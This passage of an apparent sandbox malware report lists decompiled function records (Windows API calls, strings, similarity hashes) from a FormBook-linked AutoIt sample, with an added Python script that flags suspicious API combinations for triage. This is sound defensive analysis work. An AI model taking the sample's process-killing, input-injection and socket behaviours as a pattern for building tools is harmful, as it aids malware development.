                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                    • String ID: NULL Pointer assignment
                    • API String ID: 1300414916-2785691316
                    • Opcode ID: a236a568020ec50f2e625c012cb0cc978057f466d2a8756ea9954dc08c06b5d3
                    • Instruction ID: eac10be7d9f804ffeb1433e115662f1d2057da1086ee9dd3c4f31ab6adbb65e0
                    • Opcode Fuzzy Hash: a236a568020ec50f2e625c012cb0cc978057f466d2a8756ea9954dc08c06b5d3
                    • Instruction Fuzzy Hash: E5914B71D0021DEBDB10DFA5DC85AEEBBBABF08710F20415AF519A7291DB319A45CFA0
                    APIs
                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00707093
                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 007070A7
                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007070C1
                    • _wcscat.LIBCMT ref: 0070711C
                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00707133
                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00707161
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$Window_wcscat
                    • String ID: SysListView32
                    • API String ID: 307300125-78025650
                    • Opcode ID: 14cc92b941d9806b39f792a4262eab07ea25191efee0085172b127f0050a87b7
                    • Instruction ID: 45be20083b3dcac6ae145a8ed2bb9fe1a2f8f6e655c774bef6957a93a9556800
                    • Opcode Fuzzy Hash: 14cc92b941d9806b39f792a4262eab07ea25191efee0085172b127f0050a87b7
                    • Instruction Fuzzy Hash: 8741A070904308EFEB259F64CC85BEA77E9EF08350F10462AF544A72D2D67AAD85CB64
                    APIs
                      • Part of subcall function 006E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 006E3EB6
                      • Part of subcall function 006E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 006E3EC4
                      • Part of subcall function 006E3E91: CloseHandle.KERNEL32(00000000), ref: 006E3F8E
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006FECB8
                    • GetLastError.KERNEL32 ref: 006FECCB
                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 006FECFA
                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 006FED77
                    • GetLastError.KERNEL32(00000000), ref: 006FED82
                    • CloseHandle.KERNEL32(00000000), ref: 006FEDB7
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                    • String ID: SeDebugPrivilege
                    • API String ID: 2533919879-2896544425
                    • Opcode ID: 76245350dc7b26c32b076aeb7912849f222cd406c9a439cc08667440f9c7853b
                    • Instruction ID: 1a72d11d52ba04f067ac29f1378ff9f49e3ed624e3be6dab9af2db628ff43ad2
                    • Opcode Fuzzy Hash: 76245350dc7b26c32b076aeb7912849f222cd406c9a439cc08667440f9c7853b
                    • Instruction Fuzzy Hash: 5341BF716002049FDB24EF24CC95F7DBBA6AF84714F08805DFA429B7D2DBB5A804CB99
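The per-function listings in this part of the report are what the Joe Sandbox IDA plugin recovered from the process dump: each record is one function, its resolved API calls in address order (calls made by a callee are marked "Part of subcall function"), the string references, and an "API ID" that concatenates the API names for similarity matching. A reviewer rarely reads them one at a time; the useful move is to pivot on combinations, such as the record directly above (OpenProcess and TerminateProcess next to the SeDebugPrivilege string, with a Toolhelp32 process snapshot in a subcall), the CreateProcessW record earlier in this listing, or the DuplicateHandle/CreateThread record. The script below is an added example for that triage step and is not Joe Sandbox, AutoIt or the sample's own code; it parses records in the shape shown on this page and applies a small rule set whose names and contents are this example's own choices. Its input is a constructed extract of three records from this listing, not a report export. One caveat the report itself supports: the signature list calls the binary a likely compiled AutoIt script, so a hit in these records is most plausibly the interpreter's built-in process helpers rather than code specific to the FormBook payload (an inference, not something the report states); treat it as a pivot, not as proof of payload behaviour.

```python
"""Triage helper for Joe Sandbox per-function 'APIs' listings.

Added example, not Joe Sandbox or AutoIt code. It parses records in the shape
shown on this page (an 'APIs' header, bullet lines '• Name.MODULE(args), ref: ADDR',
optionally prefixed with 'Part of subcall function ADDR:', and the 'API ID' /
'String ID' lines of the Similarity block) and flags API combinations worth a
closer look. The rule set and rule names are this example's own choices.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# One API bullet. Handles calls without an argument list ('GetLastError.KERNEL32 ref: ...'),
# CRT names containing '::' or '@' ('std::exception::exception.LIBCMT', '__CxxThrowException@8.LIBCMT')
# and the 'Part of subcall function' prefix the report uses for a callee's calls.
API_LINE = re.compile(
    r"^•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][\w@:]*)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: str                       # call-site address as printed in the report
    subcall_of: str | None = None  # callee address when marked 'Part of subcall function'


@dataclass
class FunctionRecord:
    api_id: str = ""
    calls: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)

    def api_names(self, include_subcalls: bool = True) -> set[str]:
        return {c.name for c in self.calls if include_subcalls or c.subcall_of is None}

    def call_sequence(self) -> str:
        # Calls in report order; subcalls are bracketed so the caller's own calls stand out.
        return " -> ".join(f"[{c.name}]" if c.subcall_of else c.name for c in self.calls)


def parse_records(text: str) -> list[FunctionRecord]:
    """Split the listing at every 'APIs' header and collect each record's fields."""
    records: list[FunctionRecord] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if current is None:
            continue
        m = API_LINE.match(line)
        if m:
            args = [a for a in (m.group("args") or "").split(",") if a]
            current.calls.append(ApiCall(m.group("name"), m.group("module"), args, m.group("ref"), m.group("sub")))
        elif line.startswith("• API ID:"):
            current.api_id = line.split(":", 1)[1].strip()
        elif line.startswith("• String ID:"):
            value = line.split(":", 1)[1].strip()
            current.strings = value.split("$") if value else []   # report joins strings with '$'
    return records


# (rule name, APIs that must all be present, strings that must all be present).
# Subcalls count, because the report attributes a callee's APIs to the caller.
RULES = [
    ("terminate-process-with-SeDebugPrivilege", {"OpenProcess", "TerminateProcess"}, {"SeDebugPrivilege"}),
    ("enumerate-processes", {"CreateToolhelp32Snapshot", "Process32FirstW"}, set()),
    ("launch-child-process", {"CreateProcessW"}, set()),
    ("duplicate-handle-then-create-thread", {"DuplicateHandle", "CreateThread"}, set()),
]


def evaluate(records: list[FunctionRecord]) -> list[dict]:
    """Return one finding per record that satisfies at least one rule, in record order."""
    findings = []
    for index, rec in enumerate(records):
        names, strings = rec.api_names(), set(rec.strings)
        hits = [name for name, apis, strs in RULES if apis <= names and strs <= strings]
        if hits:
            findings.append({"record": index, "api_id": rec.api_id,
                             "sequence": rec.call_sequence(), "rules": hits})
    return findings


# Constructed input: three records copied from the listing on this page, reduced to the
# lines the parser reads. Not a verbatim report export.
SAMPLE = """\
APIs
• _memset.LIBCMT ref: 006FF9C9
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 006FFB5C
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 006FFD5E
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 006FFD90
• CloseHandle.KERNEL32(?), ref: 006FFDBF
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
APIs
  • Part of subcall function 006E3E91: CreateToolhelp32Snapshot.KERNEL32 ref: 006E3EB6
  • Part of subcall function 006E3E91: Process32FirstW.KERNEL32(00000000,?), ref: 006E3EC4
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 006FECB8
• GetLastError.KERNEL32 ref: 006FECCB
• TerminateProcess.KERNEL32(00000000,00000000), ref: 006FED77
• CloseHandle.KERNEL32(00000000), ref: 006FEDB7
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0070896E
Similarity
• API ID: InvalidateRect
• String ID:
"""

if __name__ == "__main__":
    for f in evaluate(parse_records(SAMPLE)):
        print(f"record {f['record']} ({f['api_id']}): {', '.join(f['rules'])}\n    {f['sequence']}")
```

Run it directly to print each flagged record with its rule names and call sequence; feed it a larger slice of the report to triage the whole listing. The rules deliberately require the whole combination: OpenProcess on its own, or CloseHandle, appears in far too many benign functions to earn a line in a triage note, whereas OpenProcess plus TerminateProcess plus a SeDebugPrivilege reference is the pattern a reviewer actually wants surfaced.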
                    APIs
                    • LoadIconW.USER32(00000000,00007F03), ref: 006E32C5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: IconLoad
                    • String ID: blank$info$question$stop$warning
                    • API String ID: 2457776203-404129466
                    • Opcode ID: fb8db6db164a9d1eb6c714c992b2de1fd37e61d090500d473ba78bd6730dc76d
                    • Instruction ID: 15fb236559307a7a9e52d182470a6cbe3e29e14ce909e80a150054785a03bf24
                    • Opcode Fuzzy Hash: fb8db6db164a9d1eb6c714c992b2de1fd37e61d090500d473ba78bd6730dc76d
                    • Instruction Fuzzy Hash: 9811EB3160A3E6BFE7015A56DC47DABB39DEF19370F10002AFA4057382D6659F4149A9
                    APIs
                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 006E454E
                    • LoadStringW.USER32(00000000), ref: 006E4555
                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 006E456B
                    • LoadStringW.USER32(00000000), ref: 006E4572
                    • _wprintf.LIBCMT ref: 006E4598
                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 006E45B6
                    Strings
                    • %s (%d) : ==> %s: %s %s, xrefs: 006E4593
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: HandleLoadModuleString$Message_wprintf
                    • String ID: %s (%d) : ==> %s: %s %s
                    • API String ID: 3648134473-3128320259
                    • Opcode ID: fc1e5c3e0dfc1498a81406c36c0b2903acebe5e1d3b3a078c4c55daae7331a16
                    • Instruction ID: 7d087a20caea4e2a69f4248321bb1140a271fda0b5d4c571a5084bbaf967d9f9
                    • Opcode Fuzzy Hash: fc1e5c3e0dfc1498a81406c36c0b2903acebe5e1d3b3a078c4c55daae7331a16
                    • Instruction Fuzzy Hash: 2B014FF2900208FFE760E7A09D89EE7776CEB08301F0046A5FB45D2151EE799E858B74
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • GetSystemMetrics.USER32(0000000F), ref: 0070D78A
                    • GetSystemMetrics.USER32(0000000F), ref: 0070D7AA
                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0070D9E5
                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0070DA03
                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0070DA24
                    • ShowWindow.USER32(00000003,00000000), ref: 0070DA43
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0070DA68
                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0070DA8B
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                    • String ID:
                    • API String ID: 1211466189-0
                    • Opcode ID: 3459ead4abe7e521b8b73d36d821350e0531d8dd30837a461abfaa8ce8885d4d
                    • Instruction ID: 93b127b55a15b1c4e1d1d0af62a7f931f2795ce3fd6568a19637ec4f59d3fca5
                    • Opcode Fuzzy Hash: 3459ead4abe7e521b8b73d36d821350e0531d8dd30837a461abfaa8ce8885d4d
                    • Instruction Fuzzy Hash: 5FB16875600225EFDF24CFA8C9897AA7BF1FF44711F08C269EC489A295DB38AD50CB50
                    APIs
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006BC417,00000004,00000000,00000000,00000000), ref: 00682ACF
                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,006BC417,00000004,00000000,00000000,00000000,000000FF), ref: 00682B17
                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,006BC417,00000004,00000000,00000000,00000000), ref: 006BC46A
                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,006BC417,00000004,00000000,00000000,00000000), ref: 006BC4D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: ShowWindow
                    • String ID:
                    • API String ID: 1268545403-0
                    • Opcode ID: a31e059e8c6c1f5d091b8d0c5551f03b039f4c0ae83530a9ce460ffc880af8ca
                    • Instruction ID: 936222c41338585f32e0ef4cce23bd5b80d23e33a00ec71f7f37d61ef33f2fa4
                    • Opcode Fuzzy Hash: a31e059e8c6c1f5d091b8d0c5551f03b039f4c0ae83530a9ce460ffc880af8ca
                    • Instruction Fuzzy Hash: C4412BB4204682EAC73DAB28CCB87FB7BD3AF46314F54C61DE05746760CA759982D711
                    APIs
                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 006E737F
                      • Part of subcall function 006A0FF6: std::exception::exception.LIBCMT ref: 006A102C
                      • Part of subcall function 006A0FF6: __CxxThrowException@8.LIBCMT ref: 006A1041
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 006E73B6
                    • EnterCriticalSection.KERNEL32(?), ref: 006E73D2
                    • _memmove.LIBCMT ref: 006E7420
                    • _memmove.LIBCMT ref: 006E743D
                    • LeaveCriticalSection.KERNEL32(?), ref: 006E744C
                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 006E7461
                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 006E7480
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                    • String ID:
                    • API String ID: 256516436-0
                    • Opcode ID: c17a3ce70aa30a25efacb483f59226a41868099771ef7c67e0e5510b2a2201c4
                    • Instruction ID: f33d90b1af31b51f3a459d8ac37fbe2a0be8ee9f999898048c1a388d8debfaff
                    • Opcode Fuzzy Hash: c17a3ce70aa30a25efacb483f59226a41868099771ef7c67e0e5510b2a2201c4
                    • Instruction Fuzzy Hash: EC31CF31900205EBDF50EF65DC85AAE7BB9FF45300F1481A9F904AB246DB709E10CBA8
                    APIs
                    • DeleteObject.GDI32(00000000), ref: 0070645A
                    • GetDC.USER32(00000000), ref: 00706462
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0070646D
                    • ReleaseDC.USER32(00000000,00000000), ref: 00706479
                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007064B5
                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007064C6
                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00709299,?,?,000000FF,00000000,?,000000FF,?), ref: 00706500
                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00706520
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                    • String ID:
                    • API String ID: 3864802216-0
                    • Opcode ID: 23d5af7176ad5a520695a1ffeecd510cc8fef778860d80356fd0c6e0421d5d76
                    • Instruction ID: d36c52374a0e0fcd10c9bc5037e0df31f7a687755886ef60fb5ea217cb93ed6b
                    • Opcode Fuzzy Hash: 23d5af7176ad5a520695a1ffeecd510cc8fef778860d80356fd0c6e0421d5d76
                    • Instruction Fuzzy Hash: 1D317F72201614FFEB218F50DC4AFEA3FA9EF09761F044265FE08DA291DA799C51CB64
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmp
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memcmp
                    • String ID:
                    • API String ID: 2931989736-0
                    APIs
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                      • Part of subcall function 0069FEC6: _wcscpy.LIBCMT ref: 0069FEE9
                    • _wcstok.LIBCMT ref: 006EEEFF
                    • _wcscpy.LIBCMT ref: 006EEF8E
                    • _memset.LIBCMT ref: 006EEFC1
                    Strings
                    Similarity
                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                    • String ID: X
                    • API String ID: 774024439-3081909835
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    APIs
                    • IsWindow.USER32(00CD5738), ref: 0070B6A5
                    • IsWindowEnabled.USER32(00CD5738), ref: 0070B6B1
                    • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0070B795
                    • SendMessageW.USER32(00CD5738,000000B0,?,?), ref: 0070B7CC
                    • IsDlgButtonChecked.USER32(?,?), ref: 0070B809
                    • GetWindowLongW.USER32(00CD5738,000000EC), ref: 0070B82B
                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0070B843
                    Similarity
                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                    • String ID:
                    • API String ID: 4072528602-0
                    APIs
                    • _memset.LIBCMT ref: 006FF75C
                    • _memset.LIBCMT ref: 006FF825
                    • ShellExecuteExW.SHELL32(?), ref: 006FF86A
                      • Part of subcall function 00689997: __itow.LIBCMT ref: 006899C2
                      • Part of subcall function 00689997: __swprintf.LIBCMT ref: 00689A0C
                      • Part of subcall function 0069FEC6: _wcscpy.LIBCMT ref: 0069FEE9
                    • GetProcessId.KERNEL32(00000000), ref: 006FF8E1
                    • CloseHandle.KERNEL32(00000000), ref: 006FF910
                    Strings
                    Similarity
                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                    • String ID: @
                    • API String ID: 3522835683-2766056989
                    APIs
                    • GetParent.USER32(?), ref: 006E149C
                    • GetKeyboardState.USER32(?), ref: 006E14B1
                    • SetKeyboardState.USER32(?), ref: 006E1512
                    • PostMessageW.USER32(?,00000101,00000010,?), ref: 006E1540
                    • PostMessageW.USER32(?,00000101,00000011,?), ref: 006E155F
                    • PostMessageW.USER32(?,00000101,00000012,?), ref: 006E15A5
                    • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006E15C8
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    APIs
                    • GetParent.USER32(00000000), ref: 006E12B5
                    • GetKeyboardState.USER32(?), ref: 006E12CA
                    • SetKeyboardState.USER32(?), ref: 006E132B
                    • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 006E1357
                    • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 006E1374
                    • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 006E13B8
                    • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 006E13D9
                    Similarity
                    • API ID: MessagePost$KeyboardState$Parent
                    • String ID:
                    • API String ID: 87235514-0
                    APIs
                    Similarity
                    • API ID: _wcsncpy$LocalTime
                    • String ID:
                    • API String ID: 2945705084-0
                    APIs
                      • Part of subcall function 006E48AA: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,006E38D3,?), ref: 006E48C7
                      • Part of subcall function 006E48AA: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,006E38D3,?), ref: 006E48E0
                    • lstrcmpiW.KERNEL32(?,?), ref: 006E38F3
                    • _wcscmp.LIBCMT ref: 006E390F
                    • MoveFileW.KERNEL32(?,?), ref: 006E3927
                    • _wcscat.LIBCMT ref: 006E396F
                    • SHFileOperationW.SHELL32(?), ref: 006E39DB
                    Strings
                    Similarity
                    • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                    • String ID: \*.*
                    • API String ID: 1377345388-1173974218
                    APIs
                    • _memset.LIBCMT ref: 00707519
                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007075C0
                    • IsMenu.USER32(?), ref: 007075D8
                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00707620
                    • DrawMenuBar.USER32 ref: 00707633
                    Strings
                    Similarity
                    • API ID: Menu$Item$DrawInfoInsert_memset
                    • String ID: 0
                    • API String ID: 3866635326-4108050209
                    APIs
                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 0070125C
                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00701286
                    • FreeLibrary.KERNEL32(00000000), ref: 0070133D
                      • Part of subcall function 0070122D: RegCloseKey.ADVAPI32(?), ref: 007012A3
                      • Part of subcall function 0070122D: FreeLibrary.KERNEL32(?), ref: 007012F5
                      • Part of subcall function 0070122D: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00701318
                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 007012E0
                    Similarity
                    • API ID: EnumFreeLibrary$CloseDeleteOpen
                    • String ID:
                    • API String ID: 395352322-0
                    APIs
                    • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 0070655B
                    • GetWindowLongW.USER32(00CD5738,000000F0), ref: 0070658E
                    • GetWindowLongW.USER32(00CD5738,000000F0), ref: 007065C3
                    • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 007065F5
                    • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 0070661F
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 00706630
                    • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0070664A
                    Similarity
                    • API ID: LongWindow$MessageSend
                    • String ID:
                    • API String ID: 2178440468-0
                    APIs
                      • Part of subcall function 006F80A0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 006F80CB
                    • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006F64D9
                    • WSAGetLastError.WSOCK32(00000000), ref: 006F64E8
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006F6521
                    • connect.WSOCK32(00000000,?,00000010), ref: 006F652A
                    • WSAGetLastError.WSOCK32 ref: 006F6534
                    • closesocket.WSOCK32(00000000), ref: 006F655D
                    • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 006F6576
                    Similarity
                    • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                    • String ID:
                    • API String ID: 910771015-0
                    APIs
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006DE0FA
                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 006DE120
                    • SysAllocString.OLEAUT32(00000000), ref: 006DE123
                    • SysAllocString.OLEAUT32 ref: 006DE144
                    • SysFreeString.OLEAUT32 ref: 006DE14D
                    • StringFromGUID2.OLE32(?,?,00000028), ref: 006DE167
                    • SysAllocString.OLEAUT32(?), ref: 006DE175
                    Similarity
                    • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                    • String ID:
                    • API String ID: 3761583154-0
                    APIs
                      • Part of subcall function 00681D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00681D73
                      • Part of subcall function 00681D35: GetStockObject.GDI32(00000011), ref: 00681D87
